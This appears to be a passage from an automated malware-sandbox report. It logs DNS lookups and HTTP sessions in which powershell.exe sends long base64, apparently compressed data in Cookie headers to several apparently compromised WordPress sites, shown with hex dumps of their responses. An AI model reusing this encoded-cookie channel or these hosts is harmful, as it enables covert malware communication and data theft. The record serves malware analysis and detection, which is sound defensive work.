                                                    Dec 18, 2024 11:17:16.140081882 CET53619529.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:17:28.498410940 CET5510053192.168.11.201.1.1.1
                                                    Dec 18, 2024 11:17:28.665075064 CET53551001.1.1.1192.168.11.20
                                                    Dec 18, 2024 11:17:40.066517115 CET6372753192.168.11.201.1.1.1
                                                    Dec 18, 2024 11:17:41.069772959 CET6372753192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:17:41.471154928 CET53637279.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:17:41.717257023 CET53637271.1.1.1192.168.11.20
                                                    Dec 18, 2024 11:17:50.532490015 CET4952753192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:17:50.712780952 CET53495279.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:18:06.345809937 CET5855653192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:18:06.511415005 CET53585569.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:18:11.790169954 CET5349653192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:18:12.034245968 CET53534969.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:18:34.979367018 CET5868453192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:18:35.113112926 CET53586849.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:18:56.405461073 CET5911053192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:18:56.808566093 CET53591109.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:19:48.193952084 CET6325753192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:19:48.327621937 CET53632579.9.9.9192.168.11.20
                                                    Dec 18, 2024 11:22:49.616915941 CET6513853192.168.11.209.9.9.9
                                                    Dec 18, 2024 11:22:49.755600929 CET53651389.9.9.9192.168.11.20
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 18, 2024 11:17:14.713952065 CET192.168.11.201.1.1.10xda77Standard query (0)acceleratedigital.com.auA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:15.715919018 CET192.168.11.209.9.9.90xda77Standard query (0)acceleratedigital.com.auA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:28.498410940 CET192.168.11.201.1.1.10x2dadStandard query (0)saeedmdcat.comA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:40.066517115 CET192.168.11.201.1.1.10xc8d4Standard query (0)wickandjuice.co.zaA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:41.069772959 CET192.168.11.209.9.9.90xc8d4Standard query (0)wickandjuice.co.zaA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:50.532490015 CET192.168.11.209.9.9.90xb02aStandard query (0)werrrk.comA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:06.345809937 CET192.168.11.209.9.9.90x5178Standard query (0)www.anifowoshe.comA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:11.790169954 CET192.168.11.209.9.9.90xe376Standard query (0)pensuni.comA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:34.979367018 CET192.168.11.209.9.9.90xdcb0Standard query (0)skagitorganics.netA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:56.405461073 CET192.168.11.209.9.9.90x1d7fStandard query (0)thezoneheights.co.zaA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:19:48.193952084 CET192.168.11.209.9.9.90xef3cStandard query (0)alseraj.netA (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:22:49.616915941 CET192.168.11.209.9.9.90x4ac6Standard query (0)pydata.orgA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 18, 2024 11:17:15.944108963 CET1.1.1.1192.168.11.200xda77No error (0)acceleratedigital.com.au172.105.162.7A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:16.140081882 CET9.9.9.9192.168.11.200xda77No error (0)acceleratedigital.com.au172.105.162.7A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:28.665075064 CET1.1.1.1192.168.11.200x2dadNo error (0)saeedmdcat.com194.163.167.35A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:41.471154928 CET9.9.9.9192.168.11.200xc8d4No error (0)wickandjuice.co.za129.232.136.170A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:41.717257023 CET1.1.1.1192.168.11.200xc8d4No error (0)wickandjuice.co.za129.232.136.170A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:17:50.712780952 CET9.9.9.9192.168.11.200xb02aNo error (0)werrrk.com66.198.240.43A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:06.511415005 CET9.9.9.9192.168.11.200x5178No error (0)www.anifowoshe.com67.205.27.249A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:12.034245968 CET9.9.9.9192.168.11.200xe376No error (0)pensuni.com88.218.116.137A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:35.113112926 CET9.9.9.9192.168.11.200xdcb0No error (0)skagitorganics.net141.193.213.10A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:35.113112926 CET9.9.9.9192.168.11.200xdcb0No error (0)skagitorganics.net141.193.213.11A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:18:56.808566093 CET9.9.9.9192.168.11.200x1d7fNo error (0)thezoneheights.co.za197.189.243.212A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:19:48.327621937 CET9.9.9.9192.168.11.200xef3cNo error (0)alseraj.net104.21.10.224A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:19:48.327621937 CET9.9.9.9192.168.11.200xef3cNo error (0)alseraj.net172.67.164.139A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:22:49.755600929 CET9.9.9.9192.168.11.200x4ac6No error (0)pydata.org104.26.1.204A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:22:49.755600929 CET9.9.9.9192.168.11.200x4ac6No error (0)pydata.org104.26.0.204A (IP address)IN (0x0001)false
                                                    Dec 18, 2024 11:22:49.755600929 CET9.9.9.9192.168.11.200x4ac6No error (0)pydata.org172.67.71.236A (IP address)IN (0x0001)false
                                                    • acceleratedigital.com.au
                                                    • saeedmdcat.com
                                                    • wickandjuice.co.za
                                                    • werrrk.com
                                                    • www.anifowoshe.com
                                                    • pensuni.com
                                                    • skagitorganics.net
                                                    • thezoneheights.co.za
                                                    • alseraj.net
                                                    • pydata.org
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.11.2049714172.105.162.74438988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:17:16 UTC2283OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/OJnp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Van9FowL05NwxgcgwmRl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfXT27gqBOtB6zkr [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: acceleratedigital.com.au
                                                    Connection: Close
                                                    2024-12-18 10:17:18 UTC489INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:17:15 GMT
                                                    Server: Apache
                                                    X-Pingback: https://acceleratedigital.com.au/xmlrpc.php
                                                    Link: <https://acceleratedigital.com.au/wp-json/>; rel="https://api.w.org/", <https://acceleratedigital.com.au/wp-json/wp/v2/pages/14378>; rel="alternate"; title="JSON"; type="application/json", <https://acceleratedigital.com.au/>; rel=shortlink
                                                    Upgrade: h2,h2c
                                                    Connection: Upgrade, close
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:17:18 UTC7703INData Raw: 31 0d 0a 09 0d 0a 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 0a 09 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 63 63 65 6c 65 72 61 74 65 20 44 69 67 69 74 61 6c
                                                    Data Ascii: 12000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width,initial-scale=1,user-scalable=no"> <meta name="description" content="Accelerate Digital
                                                    2024-12-18 10:17:18 UTC501INData Raw: 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32
                                                    Data Ascii: radient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--2
                                                    2024-12-18 10:17:18 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:18 UTC8192INData Raw: 32 30 30 30 0d 0a 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c
                                                    Data Ascii: 2000: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0,
                                                    2024-12-18 10:17:18 UTC6INData Raw: 61 6c 2e 63 6f 6d
                                                    Data Ascii: al.com
                                                    2024-12-18 10:17:18 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:18 UTC8192INData Raw: 32 30 30 30 0d 0a 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 65 6c 65 67 61 6e 74 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 72 69 64 67 65 2d 71 6f 64 65 2d 6c 69 6e 65 61 5f 69 63 6f 6e 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 72 69 64 67 65 2f 63 73 73 2f 6c 69 6e 65 61 2d 69 63 6f 6e 73 2f 73 74 79 6c 65 2e 63 73 73 3f
                                                    Data Ascii: 2000.au/wp-content/themes/bridge/css/elegant-icons/style.min.css?ver=6.6.2' type='text/css' media='all' /><link rel='stylesheet' id='bridge-qode-linea_icons-css' href='https://acceleratedigital.com.au/wp-content/themes/bridge/css/linea-icons/style.css?
                                                    2024-12-18 10:17:18 UTC6INData Raw: 2e 34 2e 38 22 20
                                                    Data Ascii: .4.8"
                                                    2024-12-18 10:17:18 UTC2INData Raw: 0d 0a
                                                    Data Ascii:
                                                    2024-12-18 10:17:18 UTC8192INData Raw: 32 30 30 30 0d 0a 69 64 3d 22 74 70 2d 74 6f 6f 6c 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69 74 61 6c 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 72 73 36 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 31 31 22 20 69 64 3d 22 72 65 76 6d 69 6e 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 77 2e 6f 72 67 2f 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 63 65 6c 65 72 61 74 65 64 69 67 69
                                                    Data Ascii: 2000id="tp-tools-js"></script><script type="text/javascript" src="https://acceleratedigital.com.au/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.4.11" id="revmin-js"></script><link rel="https://api.w.org/" href="https://acceleratedigi


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.11.2049715194.163.167.354431972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-18 10:17:29 UTC2265OUTGET / HTTP/1.1
                                                    Cookie: EAD88BCF93=8DytH4sIAAAAAAAEAI2UbW+bMBDHv4p5t0kTCk2GuuWVAybxhAHZkLQTMsoSr0PiSUDWVuLDzyZhIUqV9gUI3/3u8N39bei6EUOUBdR3sIu49T0O6vKp3ub2tt12GgwCG4ZQ2aNG1E0M6/bPoY5hVSkgpuU2T4unTrPKPC+LU6yTZqIZ5QK9IT4yx8VbEZ9e7s3PV2GgN98K3piz6d27v/NJEIWIepAgvjEm5iyZTPtErBI7Fb1Ji3353MTNa9OKfHoX7/K9Ll5Ep9l1+lfUquAxxwbu6G7iM9ZpK58gm+K1aulxFcBwxS+62Gmub0H3vR675W6bKXbpe3JWa0R5HJ8r8CKyQDTxnUQO0UKM+ZRxw+w0vxD9jq4SDw6JMH6qJvHCTlNbRA8h12Wz5jp6QHN9AcO5bhF7rq8XTL2k7QdTj/zYMEe9VnOdMEtigStzDJtIILVWOERWGFHEIbHN2diLbeSF2MGyGly0IjNnwJFayl6BCUi5Fxkwvt4D1oqqkgIDxvQLWIrikBaix8epXLRGLjfHJorWmGHf49/EZC8dZ01fSfymZi/dtwT6n3xbjdIdLVxsnYcRHH5l6a7TjjIaJjWsaVm2I7F1WohIcFsicSjySoIf5NS5t30CsTc6DmdjQn1IsLccboZLpj9Fg4qVYXSBXEr8WRaQ1hel/EQsQR5cuChhj4xAjxtKihuCOUl3ddmUv1twooExAbKR/wCKrk1jqAQAAO2nDg==; EAD88BCF931=8DytH4sIAAAAAAAEAGVRTW+DMAz9K+MP9DTt3mVs5VAVNe0q9TKhYMBrvhQHChI/fk7pusOUQ/z8/PJsp+prdHU7Z8rZzlHkgAIRX7Exzs5ZrfWSr69mzmD02gUIc9Y4G+swLFxRa5gzbJtRHAsJYUB1x/mWWRtBC795E6Uc1B8GhTf83eEX/Yo0Vcl+C8aF6Uk44wMQYWpl1zRcIjSqy8Ht+5SxsPZ+VXwIsTqhfTh7d4VAHWg9ZyX [TRUNCATED]
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                    Host: saeedmdcat.com
                                                    Connection: Close
                                                    2024-12-18 10:17:29 UTC420INHTTP/1.1 200 OK
                                                    Date: Wed, 18 Dec 2024 10:17:29 GMT
                                                    Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
                                                    Vary: Cookie,User-Agent,Accept-Encoding
                                                    Accept-Ranges: bytes
                                                    Content-Length: 65713
                                                    Cache-Control: max-age=3600, public
                                                    Expires: Wed, 18 Dec 2024 10:17:29 GMT
                                                    Referrer-Policy: no-referrer-when-downgrade
                                                    X-Powered-By: WP Rocket/3.8.7
                                                    Pragma: public
                                                    Connection: close
                                                    Content-Type: text/html; charset=UTF-8
                                                    2024-12-18 10:17:29 UTC7772INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69 7a 65 73 3d 22 61 75 74 6f 22 20 69 5d 2c
                                                    Data Ascii: <!doctype html><html lang="en-US" prefix="og: https://ogp.me/ns#"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><style>img:is([sizes="auto" i],
                                                    2024-12-18 10:17:29 UTC8000INData Raw: 61 6c 54 72 61 63 6b 65 72 2e 74 72 61 63 6b 65 72 73 5b 68 6f 6f 6b 4e 61 6d 65 5d 28 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 28 27 65 76 65 6e 74 27 2c 20 6e 61 6d 65 2c 20 70 61 72 61 6d 65 74 65 72 73 29 3b 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 09 5f 5f 67 74 61 67 44 61 74 61 4c 61 79 65 72 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 0a 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 0a 0a 09 09 09 09 09 5f 5f 67 74 61 67 54 72 61 63 6b 65 72 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 09 09 09 09 09 5f 5f 67 74 61 67 54
                                                    Data Ascii: alTracker.trackers[hookName](parameters);} else {__gtagDataLayer('event', name, parameters);}} else {__gtagDataLayer.apply(null, arguments);}}__gtagTracker('js', new Date());__gtagT
                                                    2024-12-18 10:17:29 UTC8000INData Raw: 65 6e 74 2d 73 69 7a 65 3a 20 38 30 30 70 78 3b 2d 2d 77 70 2d 2d 73 74 79 6c 65 2d 2d 67 6c 6f 62 61 6c 2d 2d 77 69 64 65 2d 73 69 7a 65 3a 20 31 32 30 30 70 78 3b 20 7d 3a 77 68 65 72 65 28 62 6f 64 79 29 20 7b 20 6d 61 72 67 69 6e 3a 20 30 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 20 7b 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 20 7b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 65 6d 3b 20 7d 2e 77 70 2d 73 69 74 65 2d 62 6c 6f 63 6b 73 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 20 7b 20 6a 75 73 74 69 66 79 2d 63
                                                    Data Ascii: ent-size: 800px;--wp--style--global--wide-size: 1200px; }:where(body) { margin: 0; }.wp-site-blocks > .alignleft { float: left; margin-right: 2em; }.wp-site-blocks > .alignright { float: right; margin-left: 2em; }.wp-site-blocks > .aligncenter { justify-c
                                                    2024-12-18 10:17:29 UTC8000INData Raw: 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 68 65 6d 65 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 68 65 6c 6c 6f 2d 65 6c 65 6d 65 6e 74 6f 72 2f 74 68 65 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 32 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 68 65 6c 6c 6f 2d 65 6c 65
                                                    Data Ascii: hello-elementor/style.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://saeedmdcat.com/wp-content/themes/hello-elementor/theme.min.css?ver=3.2.1' media='all' /><link rel='stylesheet' id='hello-ele
                                                    2024-12-18 10:17:30 UTC8000INData Raw: 39 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 65 2d 31 30 36 30 22 3e 0a 0a 0a 3c 61 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 20 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 3e 53 6b 69 70 20 74 6f 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 73 69 74 65 2d 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 64 79 6e 61 6d 69 63 2d 68 65 61 64 65 72 20 6d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 69 6e 6e 65 72 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 62 72 61 6e 64 69 6e 67
                                                    Data Ascii: 9 elementor-page elementor-page-1060"><a class="skip-link screen-reader-text" href="#content">Skip to content</a><header id="site-header" class="site-header dynamic-header menu-dropdown-mobile"><div class="header-inner"><div class="site-branding
                                                    2024-12-18 10:17:30 UTC8000INData Raw: 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 32 35 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 65 65 64 6d 64 63 61 74 2e 63 6f 6d 2f 6b 69 70 73 2d 73 75 70 65 72 2d 66 69 6e 61 6c 2d 73 65 73 73 69 6f 6e 32 30 32 30 2f 22 3e 4b 49 50 53 20 53 55 50 45 52 20 46 49 4e 41 4c 20 53 45 53 53 49 4f 4e 28 32 30 32 30 29 3c 2f 61 3e 3c 2f 6c 69 3e 0a 09 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 31 34 30 38 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70
                                                    Data Ascii: m-type-post_type menu-item-object-page menu-item-1252"><a href="https://saeedmdcat.com/kips-super-final-session2020/">KIPS SUPER FINAL SESSION(2020)</a></li><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1408"><a href="http
